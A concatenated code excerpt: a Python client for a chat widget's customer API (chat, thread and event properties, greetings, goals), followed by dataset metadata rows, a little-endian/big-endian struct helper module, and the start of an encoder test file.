                overrides every other method parameter.
            headers (dict): Extra headers merged with the session headers
                for this single request only (not persisted).

        Returns:
            httpx.Response: Response object from the `httpx` library
                carrying the server's reply.
    '''
    request_json = prepare_payload(locals()) if payload is None else payload
    return self.session.post(
        f'{self.api_url}/send_rich_message_postback{self.query_string}',
        json=request_json,
        headers=headers)
def send_sneak_peek(self,
                    chat_id: str = None,
                    sneak_peek_text: str = None,
                    payload: dict = None,
                    headers: dict = None) -> httpx.Response:
    ''' Sends a sneak peek to a chat.

        Args:
            chat_id (str): ID of the chat to send the sneak peek to.
            sneak_peek_text (str): Text of the sneak peek.
            payload (dict): Custom request payload; when provided it
                overrides every other method parameter.
            headers (dict): Extra headers merged with the session headers
                for this single request only (not persisted).

        Returns:
            httpx.Response: Response object from the `httpx` library
                carrying the server's reply.
    '''
    request_json = prepare_payload(locals()) if payload is None else payload
    return self.session.post(
        f'{self.api_url}/send_sneak_peek{self.query_string}',
        json=request_json,
        headers=headers)
# Localization
def get_localization(self,
                     group_id: int = None,
                     language: str = None,
                     version: str = None,
                     payload: dict = None,
                     headers: dict = None) -> httpx.Response:
    ''' Fetches the localization for a language/group in a given version.

        The response holds translated phrases for the Chat Widget.

        Args:
            group_id (int): Group to fetch the localization for.
            language (str): Language to fetch the localization for.
            version (str): Localization version, as returned by
                `get_dynamic_configuration` in `localization_version`.
            payload (dict): Custom request payload; when provided it
                overrides every other method parameter.
            headers (dict): Extra headers merged with the session headers
                for this single request only (not persisted).

        Returns:
            httpx.Response: Response object from the `httpx` library
                carrying the server's reply.
    '''
    request_json = prepare_payload(locals()) if payload is None else payload
    return self.session.post(
        f'{self.api_url}/get_localization{self.query_string}',
        json=request_json,
        headers=headers)
# Properties
def update_chat_properties(self,
                           id: str = None,
                           properties: dict = None,
                           payload: dict = None,
                           headers: dict = None) -> httpx.Response:
    ''' Updates chat properties.

        Args:
            id (str): ID of the chat to set properties for.
            properties (dict): Chat properties to set, in the general
                properties format (namespace, property name, value).
            payload (dict): Custom request payload; when provided it
                overrides every other method parameter.
            headers (dict): Extra headers merged with the session headers
                for this single request only (not persisted).

        Returns:
            httpx.Response: Response object from the `httpx` library
                carrying the server's reply.
    '''
    request_json = prepare_payload(locals()) if payload is None else payload
    return self.session.post(
        f'{self.api_url}/update_chat_properties{self.query_string}',
        json=request_json,
        headers=headers)
def delete_chat_properties(self,
                           id: str = None,
                           properties: dict = None,
                           payload: dict = None,
                           headers: dict = None) -> httpx.Response:
    ''' Deletes chat properties.

        Args:
            id (str): ID of the chat to delete properties of.
            properties (dict): Chat properties to delete.
            payload (dict): Custom request payload; when provided it
                overrides every other method parameter.
            headers (dict): Extra headers merged with the session headers
                for this single request only (not persisted).

        Returns:
            httpx.Response: Response object from the `httpx` library
                carrying the server's reply.
    '''
    request_json = prepare_payload(locals()) if payload is None else payload
    return self.session.post(
        f'{self.api_url}/delete_chat_properties{self.query_string}',
        json=request_json,
        headers=headers)
def update_thread_properties(self,
                             chat_id: str = None,
                             thread_id: str = None,
                             properties: dict = None,
                             payload: dict = None,
                             headers: dict = None) -> httpx.Response:
    ''' Updates chat thread properties.

        Args:
            chat_id (str): ID of the chat whose thread is updated.
            thread_id (str): ID of the thread to set properties for.
            properties (dict): Thread properties to set, in the general
                properties format (namespace, property name, value).
            payload (dict): Custom request payload; when provided it
                overrides every other method parameter.
            headers (dict): Extra headers merged with the session headers
                for this single request only (not persisted).

        Returns:
            httpx.Response: Response object from the `httpx` library
                carrying the server's reply.
    '''
    request_json = prepare_payload(locals()) if payload is None else payload
    return self.session.post(
        f'{self.api_url}/update_thread_properties{self.query_string}',
        json=request_json,
        headers=headers)
def delete_thread_properties(self,
                             chat_id: str = None,
                             thread_id: str = None,
                             properties: dict = None,
                             payload: dict = None,
                             headers: dict = None) -> httpx.Response:
    ''' Deletes chat thread properties.

        Args:
            chat_id (str): ID of the chat whose thread is updated.
            thread_id (str): ID of the thread to delete properties of.
            properties (dict): Thread properties to delete.
            payload (dict): Custom request payload; when provided it
                overrides every other method parameter.
            headers (dict): Extra headers merged with the session headers
                for this single request only (not persisted).

        Returns:
            httpx.Response: Response object from the `httpx` library
                carrying the server's reply.
    '''
    request_json = prepare_payload(locals()) if payload is None else payload
    return self.session.post(
        f'{self.api_url}/delete_thread_properties{self.query_string}',
        json=request_json,
        headers=headers)
def update_event_properties(self,
                            chat_id: str = None,
                            thread_id: str = None,
                            event_id: str = None,
                            properties: dict = None,
                            payload: dict = None,
                            headers: dict = None) -> httpx.Response:
    ''' Updates event properties.

        Args:
            chat_id (str): ID of the chat containing the event.
            thread_id (str): ID of the thread containing the event.
            event_id (str): ID of the event to set properties for.
            properties (dict): Event properties to set, in the general
                properties format (namespace, property name, value).
            payload (dict): Custom request payload; when provided it
                overrides every other method parameter.
            headers (dict): Extra headers merged with the session headers
                for this single request only (not persisted).

        Returns:
            httpx.Response: Response object from the `httpx` library
                carrying the server's reply.
    '''
    request_json = prepare_payload(locals()) if payload is None else payload
    return self.session.post(
        f'{self.api_url}/update_event_properties{self.query_string}',
        json=request_json,
        headers=headers)
def delete_event_properties(self,
                            chat_id: str = None,
                            thread_id: str = None,
                            event_id: str = None,
                            properties: dict = None,
                            payload: dict = None,
                            headers: dict = None) -> httpx.Response:
    ''' Deletes event properties.

        Args:
            chat_id (str): ID of the chat containing the event.
            thread_id (str): ID of the thread containing the event.
            event_id (str): ID of the event to delete properties of.
            properties (dict): Event properties to delete.
            payload (dict): Custom request payload; when provided it
                overrides every other method parameter.
            headers (dict): Extra headers merged with the session headers
                for this single request only (not persisted).

        Returns:
            httpx.Response: Response object from the `httpx` library
                carrying the server's reply.
    '''
    request_json = prepare_payload(locals()) if payload is None else payload
    return self.session.post(
        f'{self.api_url}/delete_event_properties{self.query_string}',
        json=request_json,
        headers=headers)
def list_license_properties(self,
                            namespace: str = None,
                            name: str = None,
                            payload: dict = None,
                            headers: dict = None) -> httpx.Response:
    ''' Lists the properties of the license.

        Only properties the Customer has access to are returned.

        Args:
            namespace (str): Property namespace to retrieve.
            name (str): Property name.
            payload (dict): Custom payload used as the request's data.
            headers (dict): Extra headers merged with the session headers
                for this single request only (not persisted).

        Returns:
            httpx.Response: Response object from the `httpx` library
                carrying the server's reply.
    '''
    # Filter criteria travel as query parameters, not in the JSON body.
    query_params = {
        key: value
        for key, value in (('namespace', namespace), ('name', name))
        if value
    }
    return self.session.post(f'{self.api_url}/list_license_properties',
                             json=payload if payload is not None else {},
                             params=query_params,
                             headers=headers)
def list_group_properties(self,
                          group_id: int = None,
                          namespace: str = None,
                          name: str = None,
                          payload: dict = None,
                          headers: dict = None) -> httpx.Response:
    ''' Lists the properties of a given group.

        Only properties the Customer has access to are returned.

        Args:
            group_id (int): ID of the group whose properties are listed.
            namespace (str): Property namespace to retrieve.
            name (str): Property name.
            payload (dict): Custom payload used as the request's data.
            headers (dict): Extra headers merged with the session headers
                for this single request only (not persisted).

        Returns:
            httpx.Response: Response object from the `httpx` library
                carrying the server's reply.
    '''
    # Filter criteria travel as query parameters, not in the JSON body.
    query_params = {
        key: value
        for key, value in (('namespace', namespace), ('name', name))
        if value
    }
    if group_id:
        query_params['id'] = str(group_id)
    return self.session.post(f'{self.api_url}/list_group_properties',
                             json=payload if payload is not None else {},
                             params=query_params,
                             headers=headers)
# Customers
def get_customer(self,
                 payload: dict = None,
                 headers: dict = None) -> httpx.Response:
    ''' Fetches info about the Customer making the request.

        Args:
            payload (dict): Custom request payload; when provided it
                overrides every other method parameter.
            headers (dict): Extra headers merged with the session headers
                for this single request only (not persisted).

        Returns:
            httpx.Response: Response object from the `httpx` library
                carrying the server's reply.
    '''
    if payload is None:
        payload = {}
    return self.session.post(
        f'{self.api_url}/get_customer{self.query_string}',
        json=payload,
        headers=headers)
def update_customer(self,
                    name: str = None,
                    email: str = None,
                    avatar: str = None,
                    session_fields: list = None,
                    payload: dict = None,
                    headers: dict = None) -> httpx.Response:
    ''' Updates the Customer's properties.

        Args:
            name (str): Customer's name.
            email (str): Customer's email.
            avatar (str): URL of the Customer's avatar.
            session_fields (list): Custom object-enclosed key:value pairs;
                item order is respected.
            payload (dict): Custom request payload; when provided it
                overrides every other method parameter.
            headers (dict): Extra headers merged with the session headers
                for this single request only (not persisted).

        Returns:
            httpx.Response: Response object from the `httpx` library
                carrying the server's reply.
    '''
    request_json = prepare_payload(locals()) if payload is None else payload
    return self.session.post(
        f'{self.api_url}/update_customer{self.query_string}',
        json=request_json,
        headers=headers)
def set_customer_session_fields(self,
                                session_fields: list = None,
                                payload: dict = None,
                                headers: dict = None) -> httpx.Response:
    ''' Updates the Customer's session fields.

        Args:
            session_fields (list): Custom object-enclosed key:value pairs;
                item order is respected. Max keys: 100.
            payload (dict): Custom request payload; when provided it
                overrides every other method parameter.
            headers (dict): Extra headers merged with the session headers
                for this single request only (not persisted).

        Returns:
            httpx.Response: Response object from the `httpx` library
                carrying the server's reply.
    '''
    request_json = prepare_payload(locals()) if payload is None else payload
    return self.session.post(
        f'{self.api_url}/set_customer_session_fields{self.query_string}',
        json=request_json,
        headers=headers)
# Status
def list_group_statuses(self,
                        all: bool = None,
                        group_ids: list = None,
                        payload: dict = None,
                        headers: dict = None) -> httpx.Response:
    ''' Fetches the current routing statuses of agent groups.

        One of the optional parameters must be included in the request.

        Args:
            all (bool): True returns statuses of all the groups.
            group_ids (list): Table of group IDs.
            payload (dict): Custom request payload; when provided it
                overrides every other method parameter.
            headers (dict): Extra headers merged with the session headers
                for this single request only (not persisted).

        Returns:
            httpx.Response: Response object from the `httpx` library
                carrying the server's reply.
    '''
    request_json = prepare_payload(locals()) if payload is None else payload
    return self.session.post(
        f'{self.api_url}/list_group_statuses{self.query_string}',
        json=request_json,
        headers=headers)
# Other
def check_goals(self,
                session_fields: list = None,
                group_id: int = None,
                page_url: str = None,
                payload: dict = None,
                headers: dict = None) -> httpx.Response:
    ''' Triggers a check of whether goals were achieved; Agents then
        receive the information.

        Call this to provide goal parameters for the server when the
        customers limit is reached. Works only for offline Customers.

        Args:
            session_fields (list): Custom object-enclosed key:value pairs.
            group_id (int): Group ID to check the goals for.
            page_url (str): URL of the page to check the goals for.
            payload (dict): Custom request payload; when provided it
                overrides every other method parameter.
            headers (dict): Extra headers merged with the session headers
                for this single request only (not persisted).

        Returns:
            httpx.Response: Response object from the `httpx` library
                carrying the server's reply.
    '''
    request_json = prepare_payload(locals()) if payload is None else payload
    return self.session.post(
        f'{self.api_url}/check_goals{self.query_string}',
        json=request_json,
        headers=headers)
def get_form(self,
             group_id: int = None,
             type: str = None,
             payload: dict = None,
             headers: dict = None) -> httpx.Response:
    ''' Fetches an empty ticket form of a prechat or postchat survey.

        Args:
            group_id (int): ID of the group whose form is requested.
            type (str): Form type; possible values: prechat or postchat.
            payload (dict): Custom request payload; when provided it
                overrides every other method parameter.
            headers (dict): Extra headers merged with the session headers
                for this single request only (not persisted).

        Returns:
            httpx.Response: Response object from the `httpx` library
                carrying the server's reply.
    '''
    request_json = prepare_payload(locals()) if payload is None else payload
    return self.session.post(f'{self.api_url}/get_form{self.query_string}',
                             json=request_json,
                             headers=headers)
def get_predicted_agent(self,
                        payload: dict = None,
                        headers: dict = None) -> httpx.Response:
    ''' Fetches the predicted Agent — the one the Customer will chat with
        when the chat starts.

        The Customer must be logged in first (see the `login` method).

        Args:
            payload (dict): Custom request payload; when provided it
                overrides every other method parameter.
            headers (dict): Extra headers merged with the session headers
                for this single request only (not persisted).

        Returns:
            httpx.Response: Response object from the `httpx` library
                carrying the server's reply.
    '''
    if payload is None:
        payload = {}
    return self.session.post(
        f'{self.api_url}/get_predicted_agent{self.query_string}',
        json=payload,
        headers=headers)
def get_url_info(self,
                 url: str = None,
                 payload: dict = None,
                 headers: dict = None) -> httpx.Response:
    ''' Fetches info on a given URL.

        Args:
            url (str): Valid website URL.
            payload (dict): Custom request payload; when provided it
                overrides every other method parameter.
            headers (dict): Extra headers merged with the session headers
                for this single request only (not persisted).

        Returns:
            httpx.Response: Response object from the `httpx` library
                carrying the server's reply.
    '''
    request_json = prepare_payload(locals()) if payload is None else payload
    return self.session.post(
        f'{self.api_url}/get_url_info{self.query_string}',
        json=request_json,
        headers=headers)
def mark_events_as_seen(self,
                        chat_id: str = None,
                        seen_up_to: str = None,
                        payload: dict = None,
                        headers: dict = None) -> httpx.Response:
    ''' Updates the `seen_up_to` value of a given chat.

        Args:
            chat_id (str): ID of the chat to update `seen_up_to` for.
            seen_up_to (str): Timestamp in RFC 3339 date-time format.
            payload (dict): Custom request payload; when provided it
                overrides every other method parameter.
            headers (dict): Extra headers merged with the session headers
                for this single request only (not persisted).

        Returns:
            httpx.Response: Response object from the `httpx` library
                carrying the server's reply.
    '''
    request_json = prepare_payload(locals()) if payload is None else payload
    return self.session.post(
        f'{self.api_url}/mark_events_as_seen{self.query_string}',
        json=request_json,
        headers=headers)
def accept_greeting(self,
                    greeting_id: int = None,
                    unique_id: str = None,
                    payload: dict = None,
                    headers: dict = None) -> httpx.Response:
    ''' Marks an incoming greeting as seen.

        Args:
            greeting_id (int): ID of the greeting configured within the
                license to accept.
            unique_id (str): ID of the greeting to accept; available in
                the `incoming_greeting` push.
            payload (dict): Custom request payload; when provided it
                overrides every other method parameter.
            headers (dict): Extra headers merged with the session headers
                for this single request only (not persisted).

        Returns:
            httpx.Response: Response object from the `httpx` library
                carrying the server's reply.
    '''
    request_json = prepare_payload(locals()) if payload is None else payload
    return self.session.post(
        f'{self.api_url}/accept_greeting{self.query_string}',
        json=request_json,
        headers=headers)
def cancel_greeting(self,
                    unique_id: str = None,
                    payload: dict = None,
                    headers: dict = None) -> httpx.Response:
    ''' Cancels a greeting (an invitation to the chat).

        Customers can cancel a greeting, for example, by minimizing the
        chat widget that shows it.

        Args:
            unique_id (str): ID of the greeting to cancel; available in
                the `incoming_greeting` push.
            payload (dict): Custom request payload; when provided it
                overrides every other method parameter.
            headers (dict): Extra headers merged with the session headers
                for this single request only (not persisted).

        Returns:
            httpx.Response: Response object from the `httpx` library
                carrying the server's reply.
    '''
    request_json = prepare_payload(locals()) if payload is None else payload
    return self.session.post(
        f'{self.api_url}/cancel_greeting{self.query_string}',
        json=request_json,
        headers=headers)
class CustomerWeb33(CustomerWebInterface):
    ''' Customer API version 3.3 class. '''

    def __init__(self, license_id: int, access_token: str, version: str,
                 url: str, http2: bool) -> None:
        ''' Initializes the 3.3 web client.

            Args:
                license_id (int): License ID; appended as the query string
                    of every request URL.
                access_token (str): Customer access token.
                version (str): API version string.
                url (str): Base API URL.
                http2 (bool): Whether the session should use HTTP/2.

            Raises:
                ValueError: If `license_id` is not an int.
        '''
        # Fix: a constructor is annotated `-> None` (the original
        # `-> CustomerWeb33` was both semantically wrong and a NameError
        # risk when annotations are evaluated eagerly).
        super().__init__(access_token, version, url, http2)
        if not isinstance(license_id, int):
            raise ValueError(
                'Incorrect or missing `license_id` argument (should be of type int.)'
            )
        self.license_id = license_id
        self.query_string = f'?license_id={license_id}'

    def list_license_properties(self,
                                namespace: str = None,
                                name: str = None,
                                payload: dict = None,
                                headers: dict = None) -> httpx.Response:
        ''' Returns the properties of a given license. It only returns the
            properties a Customer has access to.

            Args:
                namespace (str): Property namespace to retrieve.
                name (str): Property name.
                payload (dict): Custom payload to be used as request's data.
                headers (dict): Custom headers merged with session headers
                    for this request only (not persisted).

            Returns:
                httpx.Response: The Response object from the `httpx`
                    library with the server's reply.
        '''
        if payload is None:
            payload = {}
        # Filter criteria travel as query parameters, not in the body.
        params = {}
        if namespace:
            params['namespace'] = namespace
        if name:
            params['name'] = name
        # v3.3 identifies the license via a query parameter.
        params['license_id'] = self.license_id
        return self.session.post(f'{self.api_url}/list_license_properties',
                                 json=payload,
                                 params=params,
                                 headers=headers)

    def list_group_properties(self,
                              group_id: int = None,
                              namespace: str = None,
                              name: str = None,
                              payload: dict = None,
                              headers: dict = None) -> httpx.Response:
        ''' Returns the properties of a given group. It only returns the
            properties a Customer has access to.

            Args:
                group_id (int): ID of the group whose properties are listed.
                namespace (str): Property namespace to retrieve.
                name (str): Property name.
                payload (dict): Custom payload to be used as request's data.
                headers (dict): Custom headers merged with session headers
                    for this request only (not persisted).

            Returns:
                httpx.Response: The Response object from the `httpx`
                    library with the server's reply.
        '''
        if payload is None:
            payload = {}
        # Filter criteria travel as query parameters, not in the body.
        params = {}
        if namespace:
            params['namespace'] = namespace
        if name:
            params['name'] = name
        if group_id:
            params['id'] = str(group_id)
        # v3.3 identifies the license via a query parameter.
        params['license_id'] = self.license_id
        return self.session.post(f'{self.api_url}/list_group_properties',
                                 json=payload,
                                 params=params,
                                 headers=headers)
class CustomerWeb34(CustomerWebInterface):
    ''' Customer API version 3.4 class. '''

    def __init__(self, organization_id: str, access_token: str, version: str,
                 url: str, http2: bool) -> None:
        ''' Initializes the 3.4 web client.

            Args:
                organization_id (str): Organization ID; appended as the
                    query string of every request URL.
                access_token (str): Customer access token.
                version (str): API version string.
                url (str): Base API URL.
                http2 (bool): Whether the session should use HTTP/2.

            Raises:
                ValueError: If `organization_id` is not a str.
        '''
        # Fix: a constructor is annotated `-> None` (the original
        # `-> CustomerWeb34` was both semantically wrong and a NameError
        # risk when annotations are evaluated eagerly).
        super().__init__(access_token, version, url, http2)
        if not isinstance(organization_id, str):
            raise ValueError(
                'Incorrect or missing `organization_id` argument (should be of type str.)'
            )
        self.organization_id = organization_id
        self.query_string = f'?organization_id={organization_id}'

    def list_license_properties(self,
                                namespace: str = None,
                                name: str = None,
                                payload: dict = None,
                                headers: dict = None) -> httpx.Response:
        ''' Returns the properties of a given license. It only returns the
            properties a Customer has access to.

            Args:
                namespace (str): Property namespace to retrieve.
                name (str): Property name.
                payload (dict): Custom payload to be used as request's data.
                headers (dict): Custom headers merged with session headers
                    for this request only (not persisted).

            Returns:
                httpx.Response: The Response object from the `httpx`
                    library with the server's reply.
        '''
        if payload is None:
            payload = {}
        # Filter criteria travel as query parameters, not in the body.
        params = {}
        if namespace:
            params['namespace'] = namespace
        if name:
            params['name'] = name
        # v3.4 identifies the organization via a query parameter.
        params['organization_id'] = self.organization_id
        return self.session.post(f'{self.api_url}/list_license_properties',
                                 json=payload,
                                 params=params,
                                 headers=headers)

    def list_group_properties(self,
                              group_id: int = None,
                              namespace: str = None,
                              name: str = None,
                              payload: dict = None,
                              headers: dict = None) -> httpx.Response:
        ''' Returns the properties of a given group. It only returns the
            properties a Customer has access to.

            Args:
                group_id (int): ID of the group whose properties are listed.
                namespace (str): Property namespace to retrieve.
                name (str): Property name.
                payload (dict): Custom payload to be used as request's data.
                headers (dict): Custom headers merged with session headers
                    for this request only (not persisted).

            Returns:
                httpx.Response: The Response object from the `httpx`
                    library with the server's reply.
        '''
        if payload is None:
            payload = {}
        # Filter criteria travel as query parameters, not in the body.
        params = {}
        if namespace:
            params['namespace'] = namespace
        if name:
            params['name'] = name
        if group_id:
            params['id'] = str(group_id)
        # v3.4 identifies the organization via a query parameter.
        params['organization_id'] = self.organization_id
        return self.session.post(f'{self.api_url}/list_group_properties',
                                 json=payload,
                                 params=params,
                                 headers=headers)
| 50.03732
| 150
| 0.533647
| 6,384
| 58,994
| 4.866228
| 0.059837
| 0.021116
| 0.018284
| 0.022018
| 0.825951
| 0.804159
| 0.790221
| 0.779856
| 0.756036
| 0.731153
| 0
| 0.00253
| 0.403617
| 58,994
| 1,178
| 151
| 50.079796
| 0.880397
| 0.509543
| 0
| 0.722753
| 0
| 0
| 0.102022
| 0.077824
| 0
| 0
| 0
| 0
| 0
| 1
| 0.082218
| false
| 0
| 0.011472
| 0
| 0.173996
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2159d6e9b7f721e9213f9839b1cf6aeb111a1914
| 6,854
|
py
|
Python
|
src/easystruct.py
|
zocker-160/simple-struct
|
6ad10d5989fcbfb4c06f10678e2d5dd12c5f7fc4
|
[
"WTFPL"
] | null | null | null |
src/easystruct.py
|
zocker-160/simple-struct
|
6ad10d5989fcbfb4c06f10678e2d5dd12c5f7fc4
|
[
"WTFPL"
] | null | null | null |
src/easystruct.py
|
zocker-160/simple-struct
|
6ad10d5989fcbfb4c06f10678e2d5dd12c5f7fc4
|
[
"WTFPL"
] | null | null | null |
#! /usr/bin/env python3
import struct
##
# reading
##
def read_float_buff(buffer, big_endian=False) -> float:
    """Read 4 bytes from *buffer* and decode them as an IEEE-754 float."""
    return struct.unpack(">f" if big_endian else "<f", buffer.read(4))[0]

def read_double_buff(buffer, big_endian=False) -> float:
    """Read 8 bytes from *buffer* and decode them as an IEEE-754 double."""
    return struct.unpack(">d" if big_endian else "<d", buffer.read(8))[0]

def read_uint8_buff(buffer, big_endian=False) -> int:
    """Read 1 byte from *buffer* and decode it as an unsigned 8-bit int."""
    return struct.unpack(">B" if big_endian else "<B", buffer.read(1))[0]

def read_uint16_buff(buffer, big_endian=False) -> int:
    """Read 2 bytes from *buffer* and decode them as an unsigned 16-bit int."""
    return struct.unpack(">H" if big_endian else "<H", buffer.read(2))[0]

def read_uint32_buff(buffer, big_endian=False) -> int:
    """Read 4 bytes from *buffer* and decode them as an unsigned 32-bit int."""
    return struct.unpack(">I" if big_endian else "<I", buffer.read(4))[0]

def read_uint64_buff(buffer, big_endian=False) -> int:
    """Read 8 bytes from *buffer* and decode them as an unsigned 64-bit int."""
    return struct.unpack(">Q" if big_endian else "<Q", buffer.read(8))[0]

def read_sint8_buff(buffer, big_endian=False) -> int:
    """Read 1 byte from *buffer* and decode it as a signed 8-bit int."""
    return struct.unpack(">b" if big_endian else "<b", buffer.read(1))[0]

def read_sint16_buff(buffer, big_endian=False) -> int:
    """Read 2 bytes from *buffer* and decode them as a signed 16-bit int."""
    return struct.unpack(">h" if big_endian else "<h", buffer.read(2))[0]

def read_sint32_buff(buffer, big_endian=False) -> int:
    """Read 4 bytes from *buffer* and decode them as a signed 32-bit int."""
    return struct.unpack(">i" if big_endian else "<i", buffer.read(4))[0]

def read_sint64_buff(buffer, big_endian=False) -> int:
    """Read 8 bytes from *buffer* and decode them as a signed 64-bit int."""
    return struct.unpack(">q" if big_endian else "<q", buffer.read(8))[0]
##
# writing
##
def write_float_buff(buffer, value: float, big_endian=False) -> None:
    """Encode *value* as a 4-byte float and append it to *buffer*."""
    encoded = return_float_bytes(value, big_endian)
    buffer.write(encoded)

def write_double_buff(buffer, value: float, big_endian=False) -> None:
    """Encode *value* as an 8-byte double and append it to *buffer*."""
    encoded = return_double_bytes(value, big_endian)
    buffer.write(encoded)

def write_uint8_buff(buffer, value: int, big_endian=False) -> None:
    """Encode *value* as an unsigned 8-bit int and append it to *buffer*."""
    encoded = return_uint8_bytes(value, big_endian)
    buffer.write(encoded)

def write_uint16_buff(buffer, value: int, big_endian=False) -> None:
    """Encode *value* as an unsigned 16-bit int and append it to *buffer*."""
    encoded = return_uint16_bytes(value, big_endian)
    buffer.write(encoded)

def write_uint32_buff(buffer, value: int, big_endian=False) -> None:
    """Encode *value* as an unsigned 32-bit int and append it to *buffer*."""
    encoded = return_uint32_bytes(value, big_endian)
    buffer.write(encoded)

def write_uint64_buff(buffer, value: int, big_endian=False) -> None:
    """Encode *value* as an unsigned 64-bit int and append it to *buffer*."""
    encoded = return_uint64_bytes(value, big_endian)
    buffer.write(encoded)

def write_sint8_buff(buffer, value: int, big_endian=False) -> None:
    """Encode *value* as a signed 8-bit int and append it to *buffer*."""
    encoded = return_sint8_bytes(value, big_endian)
    buffer.write(encoded)

def write_sint16_buff(buffer, value: int, big_endian=False) -> None:
    """Encode *value* as a signed 16-bit int and append it to *buffer*."""
    encoded = return_sint16_bytes(value, big_endian)
    buffer.write(encoded)

def write_sint32_buff(buffer, value: int, big_endian=False) -> None:
    """Encode *value* as a signed 32-bit int and append it to *buffer*."""
    encoded = return_sint32_bytes(value, big_endian)
    buffer.write(encoded)

def write_sint64_buff(buffer, value: int, big_endian=False) -> None:
    """Encode *value* as a signed 64-bit int and append it to *buffer*."""
    encoded = return_sint64_bytes(value, big_endian)
    buffer.write(encoded)
##
# return bytes
##
def return_float_bytes(value: float, big_endian=False) -> bytes:
    """Pack *value* as a 4-byte IEEE-754 float."""
    return struct.pack(">f" if big_endian else "<f", value)

def return_double_bytes(value: float, big_endian=False) -> bytes:
    """Pack *value* as an 8-byte IEEE-754 double."""
    return struct.pack(">d" if big_endian else "<d", value)

def return_uint8_bytes(value: int, big_endian=False) -> bytes:
    """Pack *value* as an unsigned 8-bit int (1 byte)."""
    return struct.pack(">B" if big_endian else "<B", value)

def return_uint16_bytes(value: int, big_endian=False) -> bytes:
    """Pack *value* as an unsigned 16-bit int (2 bytes)."""
    return struct.pack(">H" if big_endian else "<H", value)

def return_uint32_bytes(value: int, big_endian=False) -> bytes:
    """Pack *value* as an unsigned 32-bit int (4 bytes)."""
    return struct.pack(">I" if big_endian else "<I", value)

def return_uint64_bytes(value: int, big_endian=False) -> bytes:
    """Pack *value* as an unsigned 64-bit int (8 bytes)."""
    return struct.pack(">Q" if big_endian else "<Q", value)

def return_sint8_bytes(value: int, big_endian=False) -> bytes:
    """Pack *value* as a signed 8-bit int (1 byte)."""
    return struct.pack(">b" if big_endian else "<b", value)

def return_sint16_bytes(value: int, big_endian=False) -> bytes:
    """Pack *value* as a signed 16-bit int (2 bytes)."""
    return struct.pack(">h" if big_endian else "<h", value)

def return_sint32_bytes(value: int, big_endian=False) -> bytes:
    """Pack *value* as a signed 32-bit int (4 bytes)."""
    return struct.pack(">i" if big_endian else "<i", value)

def return_sint64_bytes(value: int, big_endian=False) -> bytes:
    """Pack *value* as a signed 64-bit int (8 bytes)."""
    return struct.pack(">q" if big_endian else "<q", value)
##
# return val
##
def return_float_val(data: bytes, big_endian=False) -> float:
    """Decode a 4-byte IEEE-754 float from *data*."""
    return struct.unpack(">f" if big_endian else "<f", data)[0]

def return_double_val(data: bytes, big_endian=False) -> float:
    """Decode an 8-byte IEEE-754 double from *data*."""
    return struct.unpack(">d" if big_endian else "<d", data)[0]

def return_uint8_val(data: bytes, big_endian=False) -> int:
    """Decode an unsigned 8-bit int from 1 byte of *data*."""
    return struct.unpack(">B" if big_endian else "<B", data)[0]

def return_uint16_val(data: bytes, big_endian=False) -> int:
    """Decode an unsigned 16-bit int from 2 bytes of *data*."""
    return struct.unpack(">H" if big_endian else "<H", data)[0]

def return_uint32_val(data: bytes, big_endian=False) -> int:
    """Decode an unsigned 32-bit int from 4 bytes of *data*."""
    return struct.unpack(">I" if big_endian else "<I", data)[0]

def return_uint64_val(data: bytes, big_endian=False) -> int:
    """Decode an unsigned 64-bit int from 8 bytes of *data*."""
    return struct.unpack(">Q" if big_endian else "<Q", data)[0]

def return_sint8_val(data: bytes, big_endian=False) -> int:
    """Decode a signed 8-bit int from 1 byte of *data*."""
    return struct.unpack(">b" if big_endian else "<b", data)[0]

def return_sint16_val(data: bytes, big_endian=False) -> int:
    """Decode a signed 16-bit int from 2 bytes of *data*."""
    return struct.unpack(">h" if big_endian else "<h", data)[0]

def return_sint32_val(data: bytes, big_endian=False) -> int:
    """Decode a signed 32-bit int from 4 bytes of *data*."""
    return struct.unpack(">i" if big_endian else "<i", data)[0]

def return_sint64_val(data: bytes, big_endian=False) -> int:
    """Decode a signed 64-bit int from 8 bytes of *data*."""
    return struct.unpack(">q" if big_endian else "<q", data)[0]
| 28.798319
| 70
| 0.651153
| 992
| 6,854
| 4.31754
| 0.048387
| 0.168106
| 0.130749
| 0.119075
| 0.894233
| 0.87929
| 0.802241
| 0.802241
| 0.780294
| 0.780294
| 0
| 0.02387
| 0.1993
| 6,854
| 237
| 71
| 28.919831
| 0.75656
| 0.009046
| 0
| 0.350877
| 0
| 0
| 0.017723
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.233918
| false
| 0
| 0.005848
| 0
| 0.590643
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
0d21daf3901eb31892670c4b1e40a9c49a738966
| 4,340
|
py
|
Python
|
tests/test_encoder.py
|
NeelayS/ezflow
|
b93a48c4adf5021f7eacbfc43220c7efa5ae55cd
|
[
"MIT"
] | 94
|
2021-11-18T18:31:18.000Z
|
2022-03-04T02:30:13.000Z
|
tests/test_encoder.py
|
NeelayS/ezflow
|
b93a48c4adf5021f7eacbfc43220c7efa5ae55cd
|
[
"MIT"
] | 72
|
2021-11-19T16:59:10.000Z
|
2022-03-02T14:39:10.000Z
|
tests/test_encoder.py
|
neu-vig/ezflow
|
1eb6f675e72b1de6db7b35d61ca4ef0082bae890
|
[
"MIT"
] | 5
|
2021-11-18T18:42:38.000Z
|
2022-03-03T11:35:26.000Z
|
import torch
from ezflow.encoder import ENCODER_REGISTRY
img = torch.randn(2, 3, 256, 256)  # shared dummy input: batch of 2, 3 channels, 256x256
def test_BasicEncoder():
    """Smoke-test the BasicEncoder registry entry under several configurations."""
    make = ENCODER_REGISTRY.get("BasicEncoder")

    # Default configuration.
    out = make(in_channels=3, out_channels=32)(img)
    assert out.shape[:2] == (2, 32)

    # Custom layer config returning intermediate feature maps.
    out = make(
        in_channels=3,
        out_channels=32,
        layer_config=(32, 64, 96),
        intermediate_features=True,
    )(img)
    assert isinstance(out, list) and len(out) == 4

